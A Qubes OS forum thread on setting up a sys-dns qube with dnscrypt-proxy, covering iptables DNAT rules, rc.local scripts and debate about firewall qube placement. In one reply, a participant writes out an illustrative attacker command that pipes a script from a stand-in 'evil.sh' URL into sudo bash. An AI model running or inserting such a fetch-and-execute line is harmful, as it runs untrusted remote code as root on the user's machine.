[guide] how to set up a sys-dns qube

I’m not familiar with that guide, but I will take a look tomorrow.

In the meantime -

Qubes needs some mechanism to allow networking to work in a flexible
environment.
PR-QBS is a chain in the nat table which allows DNS traffic to
propagate up Qubes networking until it reaches sys-net, whatever that
networking looks like and however the user changes it.
10.139.1.x are placeholders used in resolv.conf in the originating qube.
When the upstream qube sees DNS traffic to those addresses it forwards it
upstream.
This continues until it reaches sys-net, where the traffic is forwarded
to the actual DNS servers used by sys-net. Responses are returned down
the network to the originating qube.

You can interrupt this flow at any stage, by changing the rules in the
PR-QBS chain.
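
For example, a quick way to see the current rules in that chain inside a NetVM such as sys-firewall (assuming the iptables front-end is available there):

sudo iptables -t nat -L PR-QBS -n -v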

Unless someone else jumps in I’ll comment tomorrow.

Of course.
But it probably is already, because most use of iptables now is not
iptables-legacy but iptables-nft (nf_tables), which is a bridge from
the familiar iptables commands to the nftables API.
Check what you are using with iptables -V
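
For example (the version number will differ; the suffix in parentheses is what matters):

$ iptables -V
iptables v1.8.7 (nf_tables)

If it reports (legacy) instead, you are using iptables-legacy.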

Probably. Once you are clear on what is wrong, perhaps you can provide
the update.

I never presume to speak for the Qubes team. When I comment in the Forum or in the mailing lists I speak for myself.

I’m not familiar with that guide, but I will take a look tomorrow.

Great! Thank you!

PR-QBS is a chain in the nat table which allows DNS traffic to
propagate up Qubes networking until it reaches sys-net, whatever that
networking looks like and however the user changes it.

Where did you learn about all this? How can I educate myself?

10.139.1.x are placeholders used in resolv.conf in the originating qube.

But how do those relate to the actual IP addresses of the qubes as seen in Qubes Manager? The latter are quite different.

This continues until it reaches sys-net, where the traffic is forwarded
to the actual DNS servers used by sys-net. Responses are returned down
the network to the originating qube.

You can interrupt this flow at any stage, by changing the rules in the
PR-QBS chain.

Doesn’t that make sys-firewall, being a/the dedicated firewall, the proper place to do that? What is the benefit of having a whole separate sys-dns qube just for DNS compared to simply installing dnscrypt-proxy in sys-firewall (or sys-net) itself?

I may be missing something, but considering minimalism and simplicity as a security principle, as well as the (always) limited system resources, is it not overkill to have three whole VMs chained one after another just to connect to the Internet?

Check what you are using with iptables -V

As I mentioned, the command iptables does not exist in fedora-36-minimal. I have no idea which package to install and in which particular qube in order to have it in sys-dns. Assuming that the minimal template was created by experts with the intention to be minimal, I suppose it is a deliberate choice not to include iptables in it. IOW, I wonder if it is appropriate to even consider installing anything additional to the intentionally minimal system. So, this is kind of confusing. I will wait for your clarifications.

Once you are clear on what is wrong, perhaps you can provide the update.

Of course, I would be glad to help if I can. However, although I run dnscrypt-proxy on my (non-Qubes OS) Linux systems, I don’t consider myself a network expert. Perhaps that would better be done by someone who has deeper knowledge about Qubes OS and could answer questions which may arise later. It may be best to simply have dnscrypt-proxy “out of the box” in Qubes OS as the default DNS system for the non-anonymous networking. Then, one can simply customize the config files in /etc/dnscrypt-proxy. I don’t know if that has been suggested or considered, but IMO it would fit the overall philosophy of Qubes OS quite well.

Looking forward to your further comments.
Thank you.

Dear @unman,

Did you have the time to look into this?
I really hope you can help.
Thanks.

After finding some problems, I made it work.
I am working on an updated guide. Coming soon.

Looking forward to it.

The firewall documentation says:

“Qubes does not support running any networking services (e.g. VPN, local DNS server, IPS, …) directly in a qube that is used to run the Qubes firewall service (usually sys-firewall) for good reasons. In particular, if you want to ensure proper functioning of the Qubes firewall, you should not tinker with iptables or nftables rules in such qubes.”

which sounds confusing because:

  • sys-firewall is not a service, it is a VM
  • the “good reasons” have not been explicitly clarified
  • it seems impossible “not to tinker” with iptables or nftables rules if one wants to configure a qube running a DNS server, because those rules are necessary for proper packet routing

IOW, even if we deploy the network infrastructure proposed in the doc:

sys-net <--> sys-firewall-1 <--> network service qube <--> sys-firewall-2 <--> [client qubes]

we still need firewall rules in the network service qube (which will run the dnscrypt-proxy service). Does this remove the need for sys-firewall-2, which only directs DNS traffic to the network service qube? The doc says:

"The sys-firewall-2 proxy ensures that:

  1. Firewall changes done in the network service qube cannot render the Qubes firewall ineffective.
  2. Changes to the Qubes firewall by the Qubes maintainers cannot lead to unwanted information leakage in combination with user rules deployed in the network service qube.
  3. A compromise of the network service qube does not compromise the Qubes firewall."

Re. 1: Even without sys-firewall-2, the Qubes firewall (sys-firewall-1) is still separate from the network service qube. So, it is not clear how exactly sys-firewall-2 ensures anything in that regard.

Re. 2: That highly depends on the actual changes and the actual user rules. Example: Suppose the developers (deliberately or by mistake) switch the default policy of the FORWARD chain from DROP to ACCEPT. Then maybe the network service qube (not having any firewall rules, as both advised and impossible) can forward traffic through sys-firewall-1 and sys-firewall-2 can do nothing about it.

Re. 3: Just like in 1, sys-firewall-2 has nothing to do with that.

Regardless of the above confusion in documentation, one can assume that “good reasons” means improved security through additional isolation of firewall stuff from DNS. Having a second firewall between the network service qube and the client qubes can reduce the possibility of leakage from client qubes to the Internet. It also creates another possibility (more on that below).

The other confusion is that Qubes OS still uses the legacy iptables, making us dependent on it through the package qubes-core-agent-networking. To make things even more complicated, Qubes OS mixes that with nftables, making the whole thing very difficult to understand and manage. In my trials, I found it sufficient to use only iptables rules, as explained below.

So, the goal is to deploy the following network infrastructure:

[network uplink]
 └── sys-net
     └── sys-firewall
         ├── sys-dns
         │   └── sys-wall
         │       ├── qube-1
         │       ├── qube-2
         │       ├── [...]
         │       └── qube-n
         └── sys-whonix
             └── [anonymized-qubes]

Preparation

Install the fedora-37-minimal template and update it.

In dom0:

sudo qubes-dom0-update qubes-template-fedora-37-minimal
sudo qubesctl --show-output --skip-dom0 --targets fedora-37-minimal state.sls update.qubes-vm

Create a minimal disposable sys-dns qube:

Preserve the original template as an untouched starting point for other qubes.

In dom0:

qvm-shutdown fedora-37-minimal
qvm-clone fedora-37-minimal f37-m-net

Install software in the cloned template:

In dom0:

qvm-run -u root f37-m-net xterm

As per docs, qubes-core-agent-networking seems necessary for anything network related:

In f37-m-net:

dnf install qubes-core-agent-networking dnscrypt-proxy vim-minimal
systemctl disable dnscrypt-proxy

Customize files in /etc/dnscrypt-proxy.
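
The guide does not prescribe particular settings; purely as an illustration, a few options that are commonly adjusted in /etc/dnscrypt-proxy/dnscrypt-proxy.toml (example values, not recommendations):

# dnscrypt-proxy.toml (illustrative excerpt)
listen_addresses = ['127.0.0.1:53']   # matches the DNAT to 127.0.0.1 set up later in this guide
require_dnssec = true
require_nolog = true
cache = true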

Create user and group, so the service does not run as root:

groupadd --system dnscrypt
useradd --system --home /run/dnscrypt-proxy --shell /bin/false --gid dnscrypt dnscrypt
usermod --lock dnscrypt

This directory should be the same as the one used in subsections of section [sources] in /etc/dnscrypt-proxy/dnscrypt-proxy.toml. I am using a subdir of /run in order to hopefully have cache in RAM (/run is a tmpfs mount):

mkdir -p /run/dnscrypt-proxy
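
For reference (illustrative, assuming the default public-resolvers source is kept), the matching [sources] entry in dnscrypt-proxy.toml would then point its cache file into that directory:

[sources.public-resolvers]
  cache_file = '/run/dnscrypt-proxy/public-resolvers.md'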

Set proper ownership and permissions:

chown dnscrypt:dnscrypt /run/dnscrypt-proxy
chmod go-rwx /run/dnscrypt-proxy
chown -R dnscrypt:dnscrypt /etc/dnscrypt-proxy
chmod -R go-rwx /etc/dnscrypt-proxy

Use the same user in /etc/dnscrypt-proxy/dnscrypt-proxy.toml:

user_name = 'dnscrypt'

Create a disposable DNS template:

In dom0:

qvm-shutdown f37-m-net
qvm-create -C AppVM --template f37-m-net --label red f37-m-dns-dvm
qvm-prefs f37-m-dns-dvm template_for_dispvms True
qvm-create -C DispVM --template f37-m-dns-dvm --label orange sys-dns
qvm-run -u root f37-m-dns-dvm xterm

In f37-m-dns-dvm, move the config files to the /rw dir to make them specific to the disposable qube only:

mv /etc/dnscrypt-proxy /rw/

In /rw/config/rc.local:

#!/bin/sh

# This script will be executed at every VM startup, you can place your own
# custom commands here. This includes overriding some configuration in /etc,
# starting services etc.

ipt='/usr/sbin/iptables'

# allow redirects to localhost
/usr/sbin/sysctl -w net.ipv4.conf.all.route_localnet=1
"${ipt}" -I INPUT -i vif+ -p tcp --dport 53 -d 127.0.0.1 -j ACCEPT
"${ipt}" -I INPUT -i vif+ -p udp --dport 53 -d 127.0.0.1 -j ACCEPT

# block connections to other DNS servers
"${ipt}" -I FORWARD -i vif+ -p tcp --dport 53 ! -d 127.0.0.1 -j DROP
"${ipt}" -I FORWARD -i vif+ -p udp --dport 53 ! -d 127.0.0.1 -j DROP

"${ipt}" -t nat -F PR-QBS
"${ipt}" -t nat -A PR-QBS -p udp --dport 53 -j DNAT --to-destination 127.0.0.1
"${ipt}" -t nat -A PR-QBS -p tcp --dport 53 -j DNAT --to-destination 127.0.0.1

echo 'nameserver 127.0.0.1' > /etc/resolv.conf
# https://github.com/DNSCrypt/dnscrypt-proxy/wiki/Installation-linux
# https://wiki.archlinux.org/title/Dnscrypt-proxy#Enable_EDNS0
echo 'options edns0' >> /etc/resolv.conf

ln -s /rw/dnscrypt-proxy /etc/dnscrypt-proxy
/usr/bin/systemctl start dnscrypt-proxy.service

In dom0:

qvm-run -u root f37-m-net xterm

In f37-m-net:

rm -rf /etc/dnscrypt-proxy

Test if the service works:

In dom0:

qvm-shutdown f37-m-dns-dvm f37-m-net
qvm-run -u root sys-dns xterm

In sys-dns:

systemctl status dnscrypt-proxy

The above should show that the service is active and running.

Optional (for more details):

systemctl restart dnscrypt-proxy; journalctl --output=short-monotonic -f -u dnscrypt-proxy

After the start process completes, the journal shows something like:

[...]
[ 5611.615623] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] -   519ms dnswarden-uncensor-dc-swiss
[ 5611.615696] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] -   584ms pryv8boi
[ 5611.615780] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] -   760ms altername
[ 5611.615845] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] Server with the lowest initial latency: scaleway-ams (rtt: 89ms)
[ 5611.615944] sys-dns dnscrypt-proxy[2951]: [2023-01-22 21:50:02] [NOTICE] dnscrypt-proxy is ready - live servers: 33

List processes running as user dnscrypt:

In sys-dns:

ps -U dnscrypt -u dnscrypt u
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
dnscrypt    2951  0.2  2.5 1301200 100776 ?      Ssl  21:49   0:01 /usr/bin/dnscrypt-proxy -config /etc/dnscrypt-proxy/dnscrypt-proxy.toml -child
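
Not part of the original steps, but as an extra sanity check you can also try a lookup from inside sys-dns itself; since resolv.conf now points at 127.0.0.1 and dnscrypt-proxy listens there by default, the query should go through the proxy:

getent hosts qubes-os.org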

Create and configure the new minimal disposable firewall sys-wall:

We have already installed qubes-core-agent-networking in f37-m-net, so we simply use that template.

In dom0:

qvm-create -C AppVM --template f37-m-net --label red f37-m-firewall-dvm
qvm-prefs f37-m-firewall-dvm template_for_dispvms True
qvm-create -C DispVM --template f37-m-firewall-dvm --label green sys-wall

Configure the network structure based on the initial diagram.

In dom0:

qvm-prefs sys-dns netvm sys-firewall
qvm-prefs sys-dns autostart true
qvm-prefs sys-dns provides_network true
qvm-prefs sys-wall netvm sys-dns
qvm-prefs sys-wall provides_network true
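
To double-check the resulting chain from dom0, you can read the properties back (harmless; the expected values follow from the commands above):

qvm-prefs sys-dns netvm     # should print: sys-firewall
qvm-prefs sys-wall netvm    # should print: sys-dns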

Configure the firewall rules:

In dom0:

qvm-run -u root f37-m-firewall-dvm xterm

In f37-m-firewall-dvm edit /rw/config/rc.local:

#!/bin/sh

# This script will be executed at every VM startup, you can place your own
# custom commands here. This includes overriding some configuration in /etc,
# starting services etc.

ipt='/usr/sbin/iptables'

# redirect all dns-requests to sys-dns
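# NOTE: 10.138.26.87 is the IP of sys-dns on this particular system;
# check yours in Qubes Manager or with 'qvm-prefs sys-dns ip' in dom0 and adjust the rules below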
"${ipt}" -t nat -F PR-QBS
"${ipt}" -t nat -A PR-QBS -d 10.139.1.1/32 -p udp --dport 53 -j DNAT --to-destination 10.138.26.87
"${ipt}" -t nat -A PR-QBS -d 10.139.1.1/32 -p tcp --dport 53 -j DNAT --to-destination 10.138.26.87
"${ipt}" -t nat -A PR-QBS -d 10.139.1.2/32 -p udp --dport 53 -j DNAT --to-destination 10.138.26.87
"${ipt}" -t nat -A PR-QBS -d 10.139.1.2/32 -p tcp --dport 53 -j DNAT --to-destination 10.138.26.87

# block connections to other DNS servers
"${ipt}" -t nat -A PR-QBS -p udp --dport 53 -j DNAT --to-destination 0.0.0.0
"${ipt}" -t nat -A PR-QBS -p tcp --dport 53 -j DNAT --to-destination 0.0.0.0

Set sys-wall as NetVM for a qube and test in a terminal in that qube:

[user@disp1463 ~]$ host gnu.org
gnu.org has address 209.51.188.116
gnu.org has IPv6 address 2001:470:142:5::116
gnu.org mail is handled by 10 eggs.gnu.org.
[user@disp1463 ~]$ host google-analytics.com
google-analytics.com host information "This query has been locally blocked" "by dnscrypt-proxy"
google-analytics.com host information "This query has been locally blocked" "by dnscrypt-proxy"
google-analytics.com host information "This query has been locally blocked" "by dnscrypt-proxy"

That’s because my blocked_names_file has a line blocking the last host. This confirms the configuration is working.
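
For context (an illustration, not taken from the original post): the file referenced by blocked_names_file in dnscrypt-proxy.toml is simply a list of name patterns, one per line, with glob-style wildcards supported:

# comments start with '#'
google-analytics.com
ads.*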

Test if it is possible to circumvent the blockage and use another DNS server (8.8.8.8):

[user@disp1463 ~]$ host google-analytics.com 8.8.8.8
;; connection timed out; no servers could be reached

It seems sys-wall works as expected too.

Finally, set sys-wall as NetVM for all qubes which should use DNScrypt.

TODO:

  • DNScrypt-proxy allows name (un)blocking. Using a dedicated combination of sys-dns and sys-wall for a qube, it is possible to block everything and allow only one domain (or a set of them), e.g. *.mybank.com. With proper scripting and UI, this may be a possible solution to a problem discussed a long time ago.

  • Another thing is getting rid of iptables and using nftables. This seems to be something the developers need to do in relation to qubes-core-agent-networking. Has it been reported and/or considered?

  • Ideally, dnscrypt-proxy should be integrated in Qubes OS out of the box.

Comments, suggestions and corrections are very welcome. I don’t pretend to be an expert, just sharing what worked for me.

P.S. Sorry for the huge delay. I had some troubles and this whole thing took longer than expected. Still, better late than never, I hope.

@qubist Thank you for sharing, it works beautifully!

What memory parameters can you suggest in order to use the limited RAM more frugally?

I don’t understand why we need sys-wall when you yourself said that sys-firewall-2 makes no sense.

Walk me through these lines please.
Do I understand it correctly that 10.139.1.1/32 and 10.139.1.2/32 are addresses of the Qubes DNS server? If so, why are there two of them?

Is the sys-dns IP address assigned by the Qubes DHCP server always static?

What does the PR-QBS chain do, exactly? Does it forward all packets on port 53 in all qubes to 10.139.1.1-10.139.1.2? And in your example it further redirects them to the sys-dns IP?


wtf, why is unman’s post listed as my parent post?
well, whatever, he has some interesting things in his post related to my question

When the upstream qube sees DNS traffic to those addresses it forwards it upstream.

This is all fine and dandy, but how does this work exactly?
In my firewall VM I have the following iptables configuration:

  1. filter
Chain INPUT (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  any    any     anywhere             anywhere             state INVALID
    0     0 DROP       udp  --  vif+   any     anywhere             anywhere             udp dpt:bootpc
   16  1582 ACCEPT     all  --  any    any     anywhere             anywhere             ctstate RELATED,ESTABLISHED
    0     0 ACCEPT     icmp --  vif+   any     anywhere             anywhere            
    4   208 ACCEPT     all  --  lo     any     anywhere             anywhere            
    0     0 REJECT     all  --  vif+   any     anywhere             anywhere             reject-with icmp-host-prohibited
    0     0 DROP       all  --  any    any     anywhere             anywhere            

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  any    any     anywhere             anywhere             state INVALID
2241K 2453M ACCEPT     all  --  any    any     anywhere             anywhere             ctstate RELATED,ESTABLISHED
  653  160K QBS-FORWARD  all  --  any    any     anywhere             anywhere            
    0     0 DROP       all  --  vif+   vif+    anywhere             anywhere            
  653  160K ACCEPT     all  --  vif+   any     anywhere             anywhere            
    0     0 DROP       all  --  any    any     anywhere             anywhere            

Chain OUTPUT (policy ACCEPT 20 packets, 1202 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain QBS-FORWARD (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  2. mangle
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
2244K 2456M QBS-POSTROUTING  all  --  any    any     anywhere             anywhere            

Chain QBS-POSTROUTING (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  3. nat
Chain PREROUTING (policy ACCEPT 115 packets, 79516 bytes)
 pkts bytes target     prot opt in     out     source               destination         
  415  102K PR-QBS     all  --  any    any     anywhere             anywhere            
  115 79516 PR-QBS-SERVICES  all  --  any    any     anywhere             anywhere            

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 16 packets, 1042 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 ACCEPT     all  --  any    vif+    anywhere             anywhere            
    4   208 ACCEPT     all  --  any    lo      anywhere             anywhere            
  425  103K MASQUERADE  all  --  any    any     anywhere             anywhere            

Chain PR-QBS (1 references)
 pkts bytes target     prot opt in     out     source               destination         
  300 22677 DNAT       udp  --  any    any     anywhere             10.139.1.1           udp dpt:domain to:10.139.1.1
    0     0 DNAT       tcp  --  any    any     anywhere             10.139.1.1           tcp dpt:domain to:10.139.1.1
    0     0 DNAT       udp  --  any    any     anywhere             10.139.1.2           udp dpt:domain to:10.139.1.2
    0     0 DNAT       tcp  --  any    any     anywhere             10.139.1.2           tcp dpt:domain to:10.139.1.2

Chain PR-QBS-SERVICES (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  4. raw
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  !vif+  any     10.137.0.36          anywhere            
    0     0 DROP       all  --  vif7.0 any    !10.137.0.36          anywhere            
    0     0 DROP       all  --  !vif+  any     10.138.16.52         anywhere            
    0     0 DROP       all  --  vif6.0 any    !10.138.16.52         anywhere            
2245K 2457M QBS-PREROUTING  all  --  any    any     anywhere             anywhere            

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain QBS-PREROUTING (1 references)
 pkts bytes target     prot opt in     out     source               destination         

  5. security
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

The only substantial part related to PR-QBS is in the nat table, and it is just a tautology that forwards to 10.139.1.1 if the destination is 10.139.1.1.

I don’t see how it “forwards it upstream”

@qubean

What memory parameters can you suggest in order to use the limited RAM more frugally?

The minimum which doesn’t cause swapping.

The following solution for /rw/config/rc.local is a lot easier than my suggestion above and survives hotplugging of sys-dns:

#!/bin/sh

# allow redirects to localhost
/usr/sbin/sysctl -w net.ipv4.conf.all.route_localnet=1
/usr/sbin/iptables -I INPUT -i vif+ -p tcp --dport 53 -d 127.0.0.1 -j ACCEPT
/usr/sbin/iptables -I INPUT -i vif+ -p udp --dport 53 -d 127.0.0.1 -j ACCEPT

# there is no place like 127.0.0.1
echo "nameserver 127.0.0.1" > /etc/resolv.conf
echo "nameserver 127.0.0.1" >> /etc/resolv.conf

# enable hotplugging survival
qubesdb-write /qubes-primary-dns 127.0.0.1
qubesdb-write /qubes-secondary-dns 127.0.0.1

# rerun setup of DNAT rules
/usr/lib/qubes/init/network-proxy-setup.sh

# start dnscrypt-proxy
/usr/bin/systemctl start dnscrypt-proxy.service

As written above, dnscrypt-proxy has to be installed in sys-dns’ template, and at least /etc/dnscrypt-proxy/dnscrypt-proxy.toml has to be set up to your needs inside the template. As you don’t want the service running in other VMs, I suggest disabling dnscrypt-proxy.service in the template.

A separate template is not necessary. From my point of view sys-dns should be placed between sys-firewall and sys-net. One could argue to run the service in sys-net as it is the VM with the biggest attack surface anyway.

From my point of view sys-dns should be placed between sys-firewall and sys-net.

How is sys-dns protected then?

One could argue to run the service in sys-net as it is the VM with the biggest attack surface anyway.

Why would anyone want to put more data/services on the biggest attack surface, thus increasing it?

It is not. However, I am not sure what you mean by “protected”. AFAIK “protection” is offered by AV-solutions. Often they even claim to protect you “military-grade”.

Because you have to put the service somewhere if you want to run dnscrypt-proxy yourself.

Talking about attack surface: every VM has its own attack surface. I assume the biggest attack surface is presented by the apps (web browser, email client, office, instant messenger, asf.) running in AppVMs.

The Qubes-OS-way is to confine these or in this case dnscrypt-proxy.service with Xen in separate VMs, i.e. a disposable sys-dns. You could plug stuff like this

appVM <---> sys-firewall <---> sys-dns <---> sys-net <---> uplink

or you could plug your VMs like this

appVM <---> sys-firewall <---> sys-net <---> uplink
                | *
             sys-dns

or like this

appVM <---> sys-firewall <---> sys-net <---> uplink
                                  | *
                               sys-dns

instead, and

*) enforce strict firewall rules there.

You could also use a pi-hole on a RasPi in your local net and tell your router to point all DNS requests there.

@ckN6QwSZ

It is not.

Why do you suggest such a setup then?

However, I am not sure what you mean by “protected”.

The way a firewall protects.

AFAIK “protection” is offered by AV-solutions.

What is AV?

Because you have to put the service somewhere if you want to run dnscrypt-proxy yourself.

The question is why “somewhere” should be the biggest attack surface.

Talking about attack surface: every VM has its own attack surface. I assume the biggest attack surface is presented by the apps (web browser, email client, office, instant messenger, asf.) running in AppVMs.

Previously you said “sys-net is the VM with the biggest attack surface anyway.” Now you are saying other things have the biggest attack surface. I wonder what you are trying to convey.

The Qubes-OS-way is to confine these or in this case dnscrypt-proxy.service with Xen in separate VMs, i.e. a disposable sys-dns. You could plug stuff like this […]

Your examples contradict what the docs recommend (which I hoped is the Qubes OS way). Are the docs wrong? Or are you simply discussing what is possible (“could”) rather than what is better from a security perspective (“should”)?

Let me briefly clarify your confusion with the doc:

The Qubes firewall is always implemented in the next downstream (or upstream depending on your notion of that word) VM/Qube regardless of the VM name. The name of a VM doesn’t imply any functionality for Qubes OS.

So if you have
sys-net <--> sys-firewall-1 <--> network service qube <--> [client qubes]
(i.e. without sys-firewall-2 which you deem unnecessary)
the rules for [client qubes] are enforced in your network service qube.
That is the reason why the doc tells you to not mess with the firewall rules in firewall service qubes (in this case the network service qube) and guides you towards the architecture with sys-firewall-2.
sys-firewall-1 only enforces rules for the network service qube and not for any [client qubes] as you seem to think.
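
If you want to see this for yourself, the rules that Qubes generates dynamically for [client qubes] live in a dedicated nftables table inside whichever qube provides networking to them. Assuming the nftables backend is in use and the nft tool is available in that qube, something like this lists them:

sudo nft list table ip qubes-firewall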

IIRC I wrote the doc back in the days after I had had some discussion with Marek about exactly that topic. Feel free to update it though if you find more clear words.

Also, IIRC nftables supersedes iptables, i.e. there’s no duplicate use. You’ll notice that every iptables rule has a corresponding nftables rule simply because the kernel only keeps the nftables rules and translates legacy iptables instructions to nftables.
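
A quick, illustrative way to convince yourself, in a qube that has the iptables-nft front-end installed:

sudo iptables -t nat -L PR-QBS -n          # the familiar iptables view
sudo nft list ruleset | grep -A 3 PR-QBS   # the same chain, as the kernel actually stores it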

Fyi: Some time ago I published [1] to simplify the setup process of a DNS VM.

[1] GitHub - 3hhh/qubes-dns: DNS VM helper scripts

I’m not suggesting an all-in-one solution. Security is a process, not a state. In Qubes OS, Xen isolates VMs from each other. However, in every VM where you can do a

curl -s http://google.com | less

successfully, an attacker could do a

curl -sk https://somewhere.org/evil.sh | sudo /bin/bash

given he got RCE (remote code execution). As ports 443 and 80 on remote hosts are reachable, an attacker can use either one for a callback.

There are different kinds of firewalls. sys-firewall does not protect against a reverse shell or any other malicious code execution, as shown (easily reproducible) above. On the contrary, it provides connectivity.

Antivirus like Microsoft Defender.

Decide for yourself. If I understand @tripleh correctly, he suggests placing your DNS resolver inside an appVM of your choice and not messing with iptables if you don’t know what you are doing.

Me, too! :wink:

@tripleh

Thanks for stepping in.

I don’t deem sys-firewall-2 unnecessary. As you can see, I do use it in my setup (sys-wall).

The doc is confusing not because it suggests the particular infrastructure but because it does not clarify how things actually work - what your current explanation aims to compensate for.

After spending some months with Qubes OS, I notice this common pattern in the docs - the beginner and advanced levels are somewhat disconnected, making it difficult for an interested reader to go deeper.

sys-firewall-1 only enforces rules for the network service qube and not for any [client qubes] as you seem to think.

My understanding is that a firewall enforces rules for network packets, not for machines (be those physical or virtual). IOW, if sys-firewall-1 blocks all outgoing traffic on TCP port 1234 through the FORWARD chain, [client qubes] will be affected too. Please correct me if I am wrong.

IIRC I wrote the doc back in the days after I had had some discussion with Marek about exactly that topic. Feel free to update it though if you find more clear words.

I am neither a network expert nor a Qubes OS expert.

Also, IIRC nftables supersedes iptables, i.e. there’s no duplicate use. You’ll notice that every iptables rule has a corresponding nftables rule simply because the kernel only keeps the nftables rules and translates legacy iptables instructions to nftables.

That is true only if iptables-nft is installed. In a minimal Fedora 37 template it is not installed and qubes-core-agent-networking does not install it as a dependency. The result can be confusing. You see: another thing that needs documentation.
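
For anyone hitting the same wall in a minimal template, installing the Fedora iptables-nft package (as root, inside the template) should be enough:

dnf install iptables-nft
iptables -V   # should now report the nf_tables backend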

I have no idea why legacy rules and their translation are necessary. IMO, iptables has to go and only nftables should be used. I don’t know if anyone is working in that direction.

Thanks for the link too, I will have a look.

@ckN6QwSZ

Security is a process, not a state.

That doesn’t mean we should start from a known unprotected state.

In Qubes-OS xen is isolating VMs from each other. However, in every VM where you can do a […]

Only if the VM is connected to the Internet and has curl installed. But that has nothing to do with sys-dns. :slight_smile:

from me: “sys-firewall-1 only enforces rules for the network service qube and not for any [client qubes] as you seem to think.”

from you: “My understanding is that a firewall enforces rules for network packets, not for machines (be those physical or virtual). IOW, if sys-firewall-1 blocks all outgoing traffic on TCP port 1234 through the FORWARD chain, [client qubes] will be affected too. Please correct me if I am wrong.”
(IIRC quoting in replying via e-mail didn’t work on the forum, but it may be fixed by now, idk.)

Partially true:

  1. Most firewall rules involve hosts. :wink:
  2. Assuming the doc network infrastructure Qubes OS uses nft to dynamically create rules for [client qubes] inside sys-firewall-2. If you don’t have sys-firewall-2 it’ll use the [network service qube] and so on. However if you then do strange things in there, the Qubes OS firewall may not be effective. Qubes firewall rules for the [network service qube] are implemented by Qubes OS inside sys-firewall-1 (= the next downstream/upstream qube from [network service qube] perspective).
  3. If [network service qube] is e.g. used for VPN, there won’t be any relevant destination IP to block anymore in sys-firewall-1 as all you see there is traffic to the VPN server. You’ll need sys-firewall-2 to block anything relevant for [client qubes]. Btw if you wanted to allow only the VPN server destination IPs from the [network service = VPN qube], you’d still need sys-firewall-1 and configure those on the [network service qube] Qubes firewall.

from me: “Also, IIRC nftables supersedes iptables, i.e. there’s no duplicate use. You’ll notice that every iptables rule has a corresponding nftables rule simply because the kernel only keeps the nftables rules and translates legacy iptables instructions to nftables.”

from you: “That is true only if iptables-nft is installed. In a minimal Fedora 37 template it is not installed and qubes-core-agent-networking does not install it as a dependency. The result can be confusing. You see: another thing that needs documentation.”

True.

“I have no idea why legacy rules and their translation are necessary. IMO, iptables has to go and only nftables should be used. I don’t know if anyone is working in that direction.”

Qubes 4.2 only uses nft.

(IIRC quoting in replying via e-mail didn’t work on the forum, but it may be fixed by now, idk.)

I notice that “>” prefixed lines appear indented in the forum, so it seems to work fine. I use that when I reply by email.

  2. Assuming the doc network infrastructure Qubes OS uses nft to dynamically create rules for [client qubes] inside sys-firewall-2. If you don’t have sys-firewall-2 it’ll use the [network service qube] and so on.

If that is to be documented, it should come with a reminder that it applies only if the upstream qube (be that sys-firewall-2 or the [network service qube]) has qubes-core-agent-networking installed.

Qubes firewall rules for the [network service qube] are implemented by Qubes OS inside sys-firewall-1 (= the next downstream/upstream qube from [network service qube] perspective).

I suppose you mean the rules introduced through [network service qube]'s Settings tab (or through qvm-firewall). As shown in both guides above, we cannot possibly avoid using firewall rules in the [network service qube] itself. Or can we?

  3. If [network service qube] is e.g. used for VPN […]

Currently, I am looking for a way to restrict a Whonix-based qube to access only specific host(s) through Tor. Is that documented/discussed somewhere? Or can you suggest how to do it?

To avoid off-topic, I am opening another thread for this, and I hope you can comment there:

Qubes 4.2 only uses nft.

Excellent.

Good point. If an attacker wants to exploit dnscrypt-proxy, that would also require quite a few edge cases, like an existing vulnerability and exploit, some manipulated DNS answer from a pwned DNS resolver and so forth. curl, nc asf. would come in handy as well.

What I’m trying to say: if one wants to use dnscrypt-proxy one has to put the service somewhere. You could put it in your AppVM, but if all your networking VMs are supposed to use it you might want to put it somewhere upstream, like in sys-firewall, sys-net, on your router or a raspi in your local net. Or a sys-dns.

Good to know. As long as network-proxy-setup.sh hasn’t been altered profoundly, calling

/usr/lib/qubes/init/network-proxy-setup.sh

in rc.local should still work fine in Qubes OS 4.2rc1, but I haven’t had time to try it.